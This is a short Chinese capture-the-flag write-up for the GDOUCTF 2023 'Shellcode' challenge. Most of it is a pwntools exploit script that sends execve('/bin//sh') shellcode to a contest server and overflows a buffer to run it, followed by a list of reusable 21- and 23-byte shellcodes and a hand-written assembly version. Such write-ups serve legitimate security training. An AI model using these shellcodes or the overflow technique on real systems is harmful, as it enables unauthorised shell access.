Problem: [GDOUCTF 2023]Shellcode
[[toc]]
思路
- 解题大致思路
生成的shellcode放不下,选择短字节shellcode或者使用asm(shellcraft.cat("flag")),不超过0x25字节即可
EXP
- 具体攻击代码
from pwn import *
from LibcSearcher import LibcSearcher
context(log_level = 'debug',arch = 'amd64',os = 'linux')
# http://node4.anna.nssctf.cn:28369/
io = remote('node4.anna.nssctf.cn',28369)
# io = process('./pwn')
elf = ELF('./pwn')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#rop = ROP('./xxx')
name_addr = 0x6010A0
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
payload1 = shellcode
delimiter = b"Please."
io.sendlineafter(delimiter,payload1)
num = 0xa +0x8
payload2 = b"a" * num + p64(name_addr)
delimiter = b"Let's start!"
io.sendlineafter(delimiter,payload2)
io.interactive()
总结
- 32 位 短字节 shellcode -> 21 字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 - 64 位 短字节 shellcode -> 23 字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05 - 手写shellcode:
payload = asm('''
xor rax, rax
push 0x3b
pop rax
mov rdi, 0x68732f2f6e69622f
xor rsi, rsi
xor rdx, rdx
push rsi
push rdi
mov rdi, rsp
syscall
''')